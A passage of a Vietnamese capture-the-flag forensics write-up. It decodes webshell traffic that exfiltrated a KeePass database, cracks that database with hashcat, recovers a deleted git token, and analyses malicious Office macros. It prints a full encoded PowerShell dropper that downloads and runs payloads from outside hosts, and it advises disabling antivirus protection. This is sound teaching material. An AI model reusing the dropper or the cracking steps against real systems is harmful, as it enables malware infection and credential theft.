B7ptKjtM88WT8QrKDTmwUGw2720vF2jjcNd4GhnPb8cbSR7fx+ZGNKf2Iy3wpOZyrlf2lfIue0v0wWwtCj4KP/K1XoHAVS3NtE4oipikXZNz5sNvx58J7SkSa3lCKLNZ39MyC6uHYTlYoqTrtPxamUk7OKMvMialH5/FUhCGrXWm4pf6eNvGpkP+J7YhxM0+0FlKhSktpE/lGaJZ90FVmvPqoSH8qaqDbpharkip9cDxPRnj3k4L+BL2d+ynfc6n1FygRPWB/fw+bG7yGaNnIAAVl1WBuKTqaY0dTuxJDMqW5byfOiylNgk5h16qEtnSuuHGHuv+vqNltSU8s2kZuvr9s136o1cBnITiXIE1pJbKPHOkDgK2EUoOjFqsHeNYMtIJHPVfZPOMAj43kvhNb5Lv0CSBt/2Avvr4qDpd3totdzuETnNPH+O4+weaNNU9zgRzUgTFbFOsU3fCa6zwti4wcjfMGxXrENTbzJt3u2mtd1wbPWBynIKbz+hCJrz/mE3YcKjKKSofZ21ACGeQ47R6eLC3+ZTNR2Au82WCcJZFxj7QboWnqQGrruq7JGzfFxWRfF7ttCu0s3ekaN8xEcGBaUSxKiLTqyLKBFZUA8cL4Pi6yeDGBltmnEj7ilevC7+a5ipxrnUP2tLZ/ahgfzUiKm4Nl3TexRlD853DNhO+EhPXoffy0vNgoUjbqmd86mpKkjw2aD56BPRMVF0y6DcPb1P+9REg2RM1GZq8FVOl2GO0hKinwQ/Lc8CzFHnFo0aT30otUyKCdYTtnZE/oBZGkhiVxj1qmPpAfB5FvObIttjm/l36rC4JQCEnvvzzU6bpu5cDSnv+3SbdMca6X2uqogAFHp9lZRlga8dmTdlZgNjGjdiutCShaZpUZy7wxHrG62F5XIH0PyTgTpOcuiG9Lx+0MuA6q8XDKhgXqrMPb/TS22F3dggWsC747s6P9iSJVTYnA8vqaPpZu/3ELEMyeEYwq0AVnHu743nDE35ljDh4XPwzAVRddKR/ErvjJiCsqIm8SaVzdHykDTLtrS/1xTf9+PYKPFvD0zcGmdAfxbzX4aZAY0UTl0ZVbbeDmiYj9C8ZqZM26vR+/x4IntzLnnfWR9zT9WZ4Z4eCOtaK9G7M0tacF80XpZ0WXzBLiHH+DZ3gmVdR/ov+22AIPI96WvmzOpyvqgPC4XtkWnSayDu5kHxqSWJJAFkCzO1ZvvhyX2aLf9oFK1Hl2hQ6UciILWglEorm51d795HzeH01jDilI2e0G1CCw6D6jxcdYmTKshB4QSYAVCbw0pGI0dUgolgHZnm4RZ+II1ZEqNW4AkVjGV4jh7QXdbLNvoB/cwvoNzK4z/rzPzpNTBKNVaJKjx6d0ZVAAQsW09KD2egiqhQYz0mqVwrQnKqtV4PhNazHPeh1QoTczULUSj+34=351039f4a7b5";
$prefixToCut = "0UlYyJHG87EJqEz66f8af44abea0";
$suffixToCut = "351039f4a7b5";
$prefixStartPosition = strpos($inputString, $prefixToCut);
$prefixLength = strlen($prefixToCut);
$suffixStartPosition = strpos($inputString, $suffixToCut);
$suffixLength = strlen($suffixToCut);
$encodedData = substr($inputString, $prefixStartPosition + $prefixLength, $suffixStartPosition - ($prefixStartPosition + $prefixLength));
$k = "80e32263";
// Decoding base64 and reversing the operations
$compressedData = base64_decode($encodedData);
$originalData = gzuncompress(reverseX($compressedData, $k));
echo $originalData;
?>
```
Thay thế $inputString bằng những đoạn stream phía trên thì mình nhận được kết quả lần lượt là :
```
#stream1:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
```
#stream2:
drwxr-xr-x 2 developer developer 4.0K May 21 20:37 .
drwxr-xr-x 3 root root 4.0K May 20 21:28 ..
-rw-r--r-- 1 developer developer 220 May 20 21:28 .bash_logout
-rw-r--r-- 1 developer developer 3.5K May 20 21:28 .bashrc
-rw-r--r-- 1 developer developer 675 May 20 21:28 .profile
-rw-r--r-- 1 developer developer 1.6K May 21 20:37 pwdb.kdbx
```
```
#stream3:
/home/developer
```
```
#stream4:
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
```
Có vẻ như đoạn decode stream4 là kết quả sau khi đọc một file nào đó, nội dung của file này đang ở dạng base64, nhưng sau khi decode thì nó lại ra binary nên mình đoán là attacker đã đọc file pwdb.kdbx. Đây là một loại file chứa thông tin mật khẩu và dữ liệu quan trọng khác dưới dạng một cơ sở dữ liệu được mã hóa.
Để đọc file này thì mình sẽ dùng tool [keepass](https://keepass.info/)
File này cần mật khẩu nhưng mình có thể brute-force bằng hashcat. Đầu tiên mình cần chuyển file pwbd.kdbx về file hash bằng keepass2john.
``` keepass2john pwbd.kdbx > hash.txt ```
Lưu ý là nhớ xóa cái tên file bên trong file hash.txt trước khi tiến hành hashcat.
``` bash
hashcat -m 13400 -a 0 hash.txt /mnt/c/Users/admin/Downloads/rockyou.txt --force --show
```
Giờ mình đã có pass của file pwbd.kdbx là ```chainsaw```, mình sẽ mở file lên thử xem có gì.
# 3/ Illumination
Dưới đây là những file sau khi unzip :
Đề bài yêu cầu mình tìm token, nhưng có vẻ như token này đã bị xóa.
Giờ mình sẽ tìm lại thông qua các command sau :
```$ git log ``` để tìm các commit
```
commit 47241a47f62ada864ec74bd6dedc4d33f4374699
Author: SherlockSec <dan@lights.htb>
Date: Fri May 31 12:00:54 2019 +0100
Thanks to contributors, I removed the unique token as it was a security risk. Thanks for reporting responsibly!
```
Và đây là commit mà mình cần tìm, giờ mình sẽ xem token đã xóa bằng :
```git show 47241a47f62ada864ec74bd6dedc4d33f4374699```
Giờ chỉ cần decode base64 là lấy được flag
# 4/ emo
Đề bài cho mình một file word chứa macros
Như thường lệ mình vẫn dùng ```olevba``` để đọc, nhưng lần này khá nhức đầu vì đoạn script quá dài. Mình sẽ quăng nó lên Virus Total để xem những thông tin liên quan trước khi deofusecate nó .
Ở đây thì cái con malware này có thực hiện một đoạn command dài ơi là dài, giờ mình sẽ xem command này là gì thông qua mục ``` Community ``` ở ngay trang này luôn.
Lướt một hồi thì ở [link](https://www.joesandbox.com/analysis/844561/0/html) có cung cấp đầy đủ về cái command.
```IABTAFYAIAAgADAAegBYACAAKABbAFQAeQBQAGUAXQAoACIAewAyAH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAGUAJwAsACcAcgBFAEMAdABvAHIAWQAnACwAJwBzAFkAcwB0ACcALAAnAC4ASQBPAC4AZABJACcALAAnAE0AJwApACAAIAApACAAOwAgACAAIABzAGUAdAAgACAAVAB4AHkAUwBlAG8AIAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADAAfQB7ADcAfQB7ADUAfQB7ADYAfQB7ADQAfQB7ADIAfQB7ADEAfQB7ADgAfQB7ADMAfQAiAC0ARgAnAFMAWQBzAFQARQAnACwAJwBUAE0AJwAsACcASQBOACcALAAnAEUAUgAnACwAJwBwAE8AJwAsACcATgBlAFQALgBzAGUAJwAsACcAUgBWAEkAQwBFACcALAAnAE0ALgAnACwAJwBBAE4AYQBHACcAKQApACAAOwAgACAAJABOAGIAZgA1AHQAZwAzAD0AKAAnAEIAOQAnACsAJwB5AHAAJwArACgAJwA5ADAAJwArACcAcwAnACkAKQA7ACQAVgB4AG4AbAByAGUAMAA9ACQAQwBsAHUAZABrAGoAeAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA2AHIAMQB0AHUAeQA7ACQASwB5ADMAcQAwAGUAOAA9ACgAKAAnAFIAcQAnACsAJwBkAHgAJwApACsAJwB3AG8AJwArACcANQAnACkAOwAgACAAKAAgACAARABpAHIAIAAgAHYAYQBSAGkAQQBiAGwAZQA6ADAAWgB4ACkALgB2AGEAbAB1AEUAOgA6ACIAQwByAGUAQQBUAGAARQBgAGQASQBSAEUAYwBgAFQAYABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAbgBEAHAAJwArACcASgByAGIAJwApACsAKAAnAGUAJwArACcAdgBrADQAbgAnACkAKwAnAEQAJwArACcAcAAnACsAKAAnAEMAJwArACcAYwB3AHIAXwAyAGgAJwApACsAJwBuAEQAJwArACcAcAAnACkAIAAtAFIAZQBQAGwAQQBjAEUAIAAoACcAbgAnACsAJwBEAHAAJwApACwAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQARgBOADUAZwBnAG0AcwBIACAAPQAgACgAMQA4ADIALAAxADgANwAsADIAMgA5ACwAMQA0ADYALAAyADMAMQAsADEANwA3ACwAMQA1ADEALAAxADQAOQAsADEANgA2ACkAOwAkAFAAeQBvAHoAZwBlAG8APQAoACgAJwBKADUAZgAnACsAJwB5ADEAJwApACsAJwBjACcAKwAnAGMAJwApADsAIAAoACAAIAB2AGEAUgBpAEEAQgBMAEUAIABUAHgAWQBTAEUAbwAgACAAKQAuAFYAYQBsAHUARQA6ADoAIgBTAGUAYwBVAHIASQBgAFQAWQBwAGAAUgBgAE8AdABPAGMAYABvAGwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAxACcAKQArACcAMgAnACkAOwAkAEYATgA1AGcAZwBtAHMASAAgACsAPQAgACgAMQA4ADYALAAxADQAMQAsADIAMgA4ACwAMQA4ADIALAAxADcANwAsADEANwAxACwAMgAyADkALAAyADMANgAsADIAMwA5ACwAMgAzADkALAAyADMAOQAsADIAMgA4ACwAMQA4ADEALAAxADgAMgAsADEANwAxACwAMgAyADkALAAyADMANAAsADIAMwA5ACwAMgAzADkALAAyADIAOAApADsAJABIAHUAYQBqAGcAYgAwAD0AKAAoACcASgBuACcAKwAnAG8AJwApACsAJwA1AGcAJwArACcAYQAxACcAKQA7ACQAQgBiADIAOAB1AG0AbwAgAD0AIAAoACgAJwBBAGwAZQAnACsAJwA3AGcAJwApACsAJwBfADgAJwApADsAJABIAHMAYwBlAF8AagBzAD0AKAAnAEsAdgAnACsAKAAnAG4AYgAnACsAJwBvAHYAXwAnACkAKQA7ACQAUwBwAGsANQAxAHUAZQA9ACgAKAAnAEMAJwArACcANwB4AG8AJwApACsAJwA5AGcAJwArACcAbAAnACkAOwAkAFMAYwB1AHMAYgBrAGoAPQAkAEgATwBNAEUAKwAoACgAJwA1ACcAKwAnAHQAJwArACgAJwBmACcAKwAnAEoAcgBiAGUAdgAnACsAJwBrACcAKQArACgAJwA0ADUAdABmACcAKwAnAEMAYwAnACsAJwB3ACcAKQArACcAcgAnACsAKAAnAF8AMgBoACcAKwAnADUAdABmACcAKQApACAALQByAEUAcABsAEEAQwBFACAAIAAoAFsAQwBoAEEAUgBdADUAMwArAFsAQwBoAEEAUgBdADEAMQA2ACsAWwBDAGgAQQBSAF0AMQAwADIAKQAsAFsAQwBoAEEAUgBdADkAMgApACsAJABCAGIAMgA4AHUAbQBvACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQARgBOADUAZwBnAG0AcwBIACAAKwA9ACAAKAAxADgANQAsADEANwA5ACwAMQA5ADAALAAxADgANAAsADIAMgA5ACwAMQA1ADEALAAxADMAOQAsADEANQA3ACwAMQA2ADQALAAyADMANQAsADEANwA3ACwAMgAzADkALAAxADcAMQAsADEAOAAzACwAMgAzADYALAAxADQAMQAsADEAMgA4ACwAMQA4ADcALAAyADMANQAsADEAMwA0ACwAMQAyADgALAAxADUAOAAsADEANwA3ACwAMQA3ADYALAAxADMAOQApADsAJABoAGIAbQBzAGsAVgAyAFQAPQAoACgAJwBDACcAKwAnADcAeABvACcAKQArACcAOQBnACcAKwAnAGwAJwApADsAJABoAGIAbQBzAGsAVgAyAFQAPQAkAEgATwBNAEUAKwAoACgAJwA1ACcAKwAnAHQAJwArACgAJwBmACcAKwAnAEoAcgBiAGUAdgAnACsAJwBrACcAKQArACgAJwA0ADUAdABmACcAKwAnAEMAYwAnACsAJwB3ACcAKQArACcAcgAnACsAKAAnAF8AMgBoACcAKwAnADUAdABmACcAKQApACAALQByAEUAcABsAEEAQwBFACAAIAAoAFsAQwBoAEEAUgBdADUAMwArAFsAQwBoAEEAUgBdADEAMQA2ACsAWwBDAGgAQQBSAF0AMQAwADIAKQAsAFsAQwBoAEEAUgBdADkAMgApACsAJABCAGIAMgA4AHUAbQBvACsAKAAoACcALgBjACcAKwAnAG8AJwApACsAJwBuAGYAJwApADsAJABRADEAXwB5ADAANQBfAD0AKAAnAFcAJwArACgAJwA0ACcAKwAnAHEAdgB5ACcAKQArACcAegA4ACcAKQA7ACQATwBkAGIAMwBoAGYAMwA9ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAEUAQgBjAGwASQBFAE4AdAA7ACQARgBOADUAZwBnAG0AcwBIACAAKwA9ACAAKAAxADgAMwAsADEANQA0ACwAMQA3ADMALAAxADIAOAAsADEANwA1ACwAMQA1ADEALAAyADMAOAAsADEANAAwACwAMQA4ADMALAAxADYAMgAsADIAMgA4ACwAMQA3ADAALAAxADcAMwAsADEANwA5ACwAMgAyADkAKQA7ACQAQQBuAGIAeQB0ADEAeQA9ACgAJwBoACcAKwAoACcAdAB0AHAAOgAnACsAJwBdAFsAJwArACcAKABzACkAXQAnACkAKwAoACgAJwB3AF0AJwArACcAWwAoACcAKQApACsAKAAoACcAcwApACcAKwAnAF0AdwAnACkAKQArACgAJwBkAGEAJwArACcALQAnACkAKwAnAGkAJwArACcAbgAnACsAJwBkAHUAJwArACgAJwBzACcAKwAnAHQAcgBpAGEAbAAuACcAKwAnAGgAJwArACcAdAAnACkAKwAnAGIAXQAnACsAKAAnAFsAKABzACkAXQAnACsAJwB3ACcAKwAnAGoAcwAnACkAKwAoACgAJwBdACcAKwAnAFsAKAAnACkAKQArACgAKAAnAHMAJwArACcAKQBdAHcAOQBJAGQATAAnACsAJwBQAF0AWwAnACsAJwAoAHMAJwArACcAKQBdAHcAJwArACcAQABoACcAKQApACsAKAAnAHQAJwArACcAdABwADoAXQAnACkAKwAoACcAWwAoAHMAJwArACcAKQBdACcAKQArACcAdwAnACsAKAAnAF0AJwArACcAWwAoAHMAKQBdACcAKQArACgAJwB3AGQAYQBwACcAKwAnAHIAbwAnACsAJwBmAGUAcwBpAG8AbgBhACcAKwAnAGwALgBoACcAKQArACcAdABiACcAKwAoACcAXQBbACgAcwAnACsAJwApACcAKwAnAF0AJwApACsAJwB3ACcAKwAoACcAZAAnACsAJwBhAHQAYQAnACkAKwAoACcANABdAFsAKABzACcAKwAnACkAXQB3AGgAJwApACsAKAAnAFcAZwBXACcAKwAnAGoAVAAnACkAKwAoACcAVgBdACcAKwAnAFsAJwApACsAKAAnACgAcwApAF0AdwBAAGgAdAB0AHAAJwArACcAcwA6AF0AWwAoAHMAJwArACcAKQBdACcAKwAnAHcAJwArACcAXQAnACkAKwAnAFsAJwArACgAJwAoAHMAKQAnACsAJwBdAHcAZABhAGcAJwArACcAcgBhACcAKQArACcAbgBpACcAKwAnAHQAJwArACgAJwBlAGcAJwArACcAaQBhACcAKQArACgAJwByAGUALgBoACcAKwAnAHQAJwApACsAJwBiAF0AJwArACgAJwBbACcAKwAnACgAcwApACcAKQArACgAJwBdAHcAdwAnACsAJwBwAC0AYQAnACsAJwBkAG0AJwArACcAaQBuAF0AWwAoAHMAKQAnACsAJwBdAHcAdAAnACkAKwAoACcAVgBdAFsAJwArACcAKABzACcAKwAnACkAJwApACsAKAAnAF0AdwBAACcAKwAnAGgAJwApACsAJwB0AHQAJwArACcAcAAnACsAKAAnADoAJwArACcAXQBbACcAKQArACgAJwAoAHMAKQBdAHcAXQBbACcAKwAnACgAcwAnACsAJwApAF0AdwB3AHcAJwArACcAdwAnACsAJwAuAG8AdQB0ACcAKwAnAHMAJwArACcAcAAnACkAKwAoACcAbwBrACcAKwAnAGUAJwApACsAJwBuAHYAJwArACcAaQAnACsAKAAnAHMAJwArACcAaQBvAG4AcwAuACcAKQArACgAJwBoAHQAYgAnACsAJwBdACcAKQArACcAWwAnACsAKAAnACgAcwApAF0AdwAnACsAJwB3AHAAJwArACcALQBpAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAJwApACsAKAAnAGUAcwBdAFsAKABzACkAJwArACcAXQB3AGEAVwAnACsAJwBvACcAKwAnAE0AJwApACsAKAAnAF0AJwArACcAWwAoACcAKwAnAHMAKQBdAHcAJwApACsAKAAnAEAAJwArACcAaAB0AHQAcAA6AF0AJwApACsAKAAnAFsAKABzACkAJwArACcAXQB3AF0AWwAoACcAKwAnAHMAKQAnACkAKwAoACcAXQB3AG0AbwAnACsAJwBiAHMAJwApACsAKAAnAG8AJwArACcAdQBrAC4AaAAnACkAKwAoACgAJwB0ACcAKwAnAGIAXQBbACgAJwApACkAKwAoACgAJwBzACkAJwArACcAXQB3AHcAcAAtACcAKQApACsAJwBpAG4AJwArACcAYwAnACsAJwBsACcAKwAoACcAdQBkAGUAJwArACcAcwBdACcAKwAnAFsAJwApACsAKAAnACgAcwApAF0AJwArACcAdwAnACkAKwAoACcAVQBZACcAKwAnADMAMABSAF0AJwApACsAKAAnAFsAKABzACcAKwAnACkAXQB3ACcAKwAnAEAAJwArACcAaAAnACsAJwB0AHQAcAA6AF0AWwAnACkAKwAoACcAKAAnACsAJwBzACkAXQB3ACcAKQArACgAJwBdAFsAJwArACcAKABzACkAJwApACsAKAAnAF0AJwArACcAdwBiACcAKQArACcAaQAnACsAKAAnAGcAJwArACcAbABhAHUAZwBoACcAKwAnAHMAJwApACsAKAAoACcALgBoACcAKwAnAHQAJwArACcAYgBdAFsAKABzACcAKQApACsAKAAoACcAKQBdACcAKQApACsAKAAnAHcAcwAnACsAJwBtAGEAbABsAHAAbwB0ACcAKwAnAGEAdABvACcAKQArACcAZQBzACcAKwAoACgAJwBdACcAKwAnAFsAKABzACcAKQApACsAKAAoACcAKQBdAHcAWQBdACcAKwAnAFsAKABzACcAKwAnACkAXQB3ACcAKwAnAEAAaAAnACsAJwB0AHQAcABzADoAXQBbACgAcwApACcAKQApACsAJwBdAHcAJwArACgAJwBdAFsAKAAnACsAJwBzACkAXQB3AG4AJwArACcAZwAnACkAKwAoACcAbABsACcAKwAnAG8AJwApACsAKAAnAGcAaQBzAHQAJwArACcAaQAnACkAKwAoACcAYwBzAC4AJwArACcAaAAnACkAKwAnAHQAJwArACgAJwBiAF0AJwArACcAWwAnACsAJwAoACcAKwAnAHMAKQBdAHcAJwApACsAJwBhAGQAJwArACgAJwBtAGkAJwArACcAbgAnACkAKwAnAGUAcgAnACsAJwBdACcAKwAoACcAWwAoAHMAJwArACcAKQBdAHcAJwArACcAVwAzAG0AJwApACsAJwBrACcAKwAoACgAJwBCACcAKwAnAF0AWwAoAHMAJwApACkAKwAoACgAJwApACcAKwAnAF0AdwAnACkAKQApAC4AIgByAGUAcABgAEwAQQBjAEUAIgAoACgAJwBdACcAKwAnAFsAJwArACgAJwAoAHMAKQBdACcAKwAnAHcAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAUABgAGwASQBUACIAKAAkAEkAdgBnADMAegBjAHUAIAArACAAJABWAHgAbgBsAHIAZQAwACAAKwAgACQASgB6AGEAZQB3AGQAeQApADsAJABHAGMAbwB5AHYAbAB2AD0AKAAoACcASwBmACcAKwAnAF8AJwApACsAKAAnADkAJwArACcAZQB0ADEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEEAOABpADMAawBlADEAIABpAG4AIAAkAEEAbgBiAHkAdAAxAHkAKQB7AHQAcgB5AHsAJABPAGQAYgAzAGgAZgAzAC4AIgBkAE8AYABXAG4ATABPAEEAYABkAGYASQBMAGUAIgAoACQAQQA4AGkAMwBrAGUAMQAsACAAJABTAGMAdQBzAGIAawBqACkAOwAkAFoAaABjAG4AYQB1AHgAPQAoACgAJwBFAGsAJwArACcAawAnACkAKwAoACcAagAnACsAJwA0ADcAdAAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABTAGMAdQBzAGIAawBqACkALgAiAEwARQBuAGAARwBUAGgAIgAgAC0AZwBlACAANAA1ADEAOQA5ACkAIAB7ACQAewBBADgAYABJAGAAMwBLAEUAMQB9AC4AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAJwBhAHkAJwAsACcAVABvAEMAaABhACcALAAnAHIAQQByAHIAJwApAC4ASQBuAHYAbwBrAGUAKAApACAAfAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9AHsAMwB9ACIAIAAtAGYAJwAtACcALAAnAGEAYwBoACcALAAnAEYAbwByAEUAJwAsACcATwBiAGoAZQBjAHQAJwApACAALQBwAHIAbwBjAGUAcwBzACAAewAgACQAewBGAE4ANQBgAEcARwBtAGAAUwBoAH0AIAArAD0AIAAoAFsAYgB5AHQAZQBdAFsAYwBoAGEAcgBdACQAewBfAH0AIAAtAGIAeABvAHIAIAAwAHgAZABmACAAKQAgAH0AOwAgACQARgBOADUAZwBnAG0AcwBIACAAKwA9ACAAKAAyADIAOAApADsAIAAkAGIAMABSAGoAZQAgAD0AIAAgAFsAdAB5AHAAZQBdACgAIgB7ADEAfQB7ADAAfQAiACAALQBGACcAVgBlAHIAVAAnACwAJwBDAG8AbgAnACkAOwAgACAAIAAkAEIAMABSAGoARQA6ADoAIgB0AE8AYABCAGEAUwBgAEUANgA0AFMAYABUAFIASQBgAE4AZwAiACgAJAB7AGYAbgA1AGAAZwBnAG0AYABzAGgAfQApACAAfAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAGkAbABlACcALAAnAHUAdAAtAGYAJwAsACcAbwAnACkAIAAkAHsAaABCAGAAbQBTAEsAYABWADIAVAB9ADsAIAAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAoACcAdwBpACcAKwAnAG4AJwApACsAKAAnADMAMgBfACcAKwAnAFAAcgBvAGMAJwArACcAZQAnACkAKwAnAHMAJwArACcAcwAnACkAKQAuACIAYwBSAGAAZQBhAFQARQAiACgAJABTAGMAdQBzAGIAawBqACkAOwAkAEcAbAB3AGsAaQA2AGEAPQAoACcASQAnACsAJwBtACcAKwAoACcAdABkACcAKwAnAHgAdgA2ACcAKQApADsAYgByAGUAYQBrADsAJABQAGYAcABiAGwAaAAxAD0AKAAnAFYAcwAnACsAKAAnAGwAYQBsACcAKwAnAGMAJwApACsAJwB1ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARgA0ADcAaQBlAGYAMgA9ACgAKAAnAEIAbgAnACsAJwB6AGkAZAAnACkAKwAnAHIAdAAnACk```
Thử decode thì nó ra thì mình nhận được một đoạn PS code
Lúc này mình có thử dùng PSDecode nhưng không khả thi nên chỉ còn cách đọc chay.
Chú ý vào biến ```FN5ggmsH``` thì mình thấy nó là một list các con số, sau đó nó được đưa về dạng kí tự, chuyển sang byte và đem xor với ```0xdf```. Mình viết một đoạn python để tái hiện lại hành vi của biến ``` FN5ggmsH```
```python=
num = (182, 187, 229, 146, 231, 177, 151, 149, 166)
num+= (186, 141, 228, 182, 177, 171, 229, 236, 239, 239, 239, 228, 181, 182, 171, 229, 234, 239, 239, 228)
num+= (185, 179, 190, 184, 229, 151, 139, 157, 164, 235, 177, 239, 171, 183, 236, 141, 128, 187, 235, 134, 128, 158, 177, 176, 139)
num+=(183, 154, 173, 128, 175, 151, 238, 140, 183, 162, 228, 170, 173, 179, 229)
res =[]
for i in num:
res.append(chr((i) ^ 0xdf))
result_string = ''.join(res)
print(result_string)
```
Và kết quả của nó lại là flag
# oBfsC4t10n
Đề bài cung cấp 1 file excel, khi mở thì file này xuất hiện lỗi, đây là một file độc hại và đề bài yêu cầu mình tìm hiểu cơ chế hoạt động của file này.
Mà thường thì những cái file Excel, Word độc hại sẽ liên quan tới macro, về macro thì mình có nhắc tới ở những bài write up trước đây của mình rồi nên ở bài này mình không nhắc lại khái niệm nữa.
Bước đầu tiên đối với những bài như này chính là tắt Real-time protection để tránh file bị xóa. Bài này hard nên mình sẽ làm cẩn thận, tập trung vào C2 và IOC.
Mình sẽ xem tổng quan file này bằng 2 command :
```$ ./pypy ~/Downloads/ViperMonkey-master/vipermonkey/vmonkey.py invoice-42369643.xlsm```
```$ olevba invoice-42369643.xlsm```
Và đây là kết quả :
Như trên hình thì có một file LwTHLrGh.hta được thực thi sau khi file Excel được mở, chưa kể đến cái tên kì lạ của nó mình sẽ tìm hiểu xem file .hta là file gì.
:::success
Tệp tin .hta chứa mã HTML, JavaScript và VBScript và có khả năng sử dụng các tính năng và API của hệ thống Windows, cho phép bạn tạo ra các ứng dụng desktop tương tự như các ứng dụng Windows truyền thống. Các tệp .hta thường chạy trong một môi trường được gọi là "HTML Application Host" (mshta.exe) trên hệ thống Windows.
Điều này cho phép bạn tạo các ứng dụng độc lập mà không cần trình duyệt web, và chúng có thể truy cập các tài nguyên hệ thống như tệp, thư mục, và thậm chí cả các API của Windows. Tuy nhiên, do tính linh hoạt này, các tệp .hta cũng có thể được sử dụng để tạo các ứng dụng độc hại hoặc có nguy cơ bảo mật, nên cần được xử lý cẩn thận khi mở các tệp .hta từ nguồn không đáng tin cậy.
:::
Mục tiêu kế tiếp của mình là xem nội dung bên trong tệp LwTHLrGh.hta. Mình sẽ lấy md5 của file Excel và paste vào mục search ở trang [any.run](https://any.run/). Đây làm một trang web giúp mình chơi với malware một cách an toàn, theo dõi hành vi của nó mà không cần đặt lên hệ thống của mình.
``` $ md5sum invoice-42369643.xlsm ``` -> lấy md5
Truy cập trang web trên, nhấn vào mục public task, paste md5 và chọn mục đầu tiên.
Ở mục Processes nó hiển thị những tiến trình quan trọng, tiến trình có PID 1048 sinh ra tiến trình PID 2188 , và đây chính là tiến trình thực thi file LwTHLrGh.hta mà mình xem là khả nghi lúc ban đầu.
